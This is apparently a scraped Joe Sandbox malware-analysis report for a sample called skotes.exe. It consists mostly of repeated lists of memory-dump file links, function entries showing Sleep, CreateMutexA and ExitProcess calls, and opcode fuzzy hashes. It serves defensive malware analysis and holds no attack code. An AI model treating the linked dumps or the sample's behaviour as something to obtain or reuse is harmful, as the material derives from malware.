Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
Instruction ID: 632d9fab2a9d2fe0873d983d54fb034023beb8ec72c64e01e7aef8ded841783b
Opcode Fuzzy Hash: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
Instruction Fuzzy Hash: AF211D75E0011AAFDF01EBA4DE82EBEB7B9EF48710F11005DF505A7251DB399D01ABA1

Analysis Process: skotes.exePID: 8168, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	614
Total number of Limit Nodes:	4

Executed Functions

Function 00FE652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00FE652A,?,?,?,?,?,00FE7661), ref: 00FE6567

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a04852afeffc82e3a8b9c751d0397243969a8290a3bfdcd3cc2c0cfba229f737
Instruction ID: f6142217dc751995a96501303c604dcfee194a48c0a8cd351b4315e1e7e941e5
Opcode Fuzzy Hash: a04852afeffc82e3a8b9c751d0397243969a8290a3bfdcd3cc2c0cfba229f737
Instruction Fuzzy Hash: 2CE0863021028C6FCE35BB19CC5D94C3B19EB517A5F140804FD1486121CB29DD41DA90

Function 00FB9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3974c12e577e03c2db10f9e3c840f43b428f0b432d6a9dca2fb231ee3ae21800
Instruction ID: c8ecf8bd66ffc36f039a11c29560257d22f28808536de193e6519dc1abaa78d9
Opcode Fuzzy Hash: 3974c12e577e03c2db10f9e3c840f43b428f0b432d6a9dca2fb231ee3ae21800
Instruction Fuzzy Hash: A4312C71B041019BEB189B79DDC9BEDBB62EBC1320F24821CE1149B2D5C7B94981EF51

Function 00FB9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9519eea197813f5b0beb5f16b1185059c9105cd892bb0bec66ad649286ca954e
Instruction ID: 63dac8cb9edf6eca05384fe90434567c2cfce8da32ba4ddede2d93b140a35680
Opcode Fuzzy Hash: 9519eea197813f5b0beb5f16b1185059c9105cd892bb0bec66ad649286ca954e
Instruction Fuzzy Hash: 40315D317042009BEB18AB79DD897EDB762EF85330F20461DE114DB2D5D77A8980EF52

Function 00FBA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9dc76a6a9904b2bfb3b911ef50d58e26ae6bf1062a0516dc8a91f8da3064363b
Instruction ID: 013108b8f1bc6fcf18b74be9eba18eefbcb5d115acac72e841b7995657bf30fb
Opcode Fuzzy Hash: 9dc76a6a9904b2bfb3b911ef50d58e26ae6bf1062a0516dc8a91f8da3064363b
Instruction Fuzzy Hash: 76311631B001019BEB18EB7DDD89BEDB762EB81320F24421DE0149B2D5D77A9980EF56

Function 00FBA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
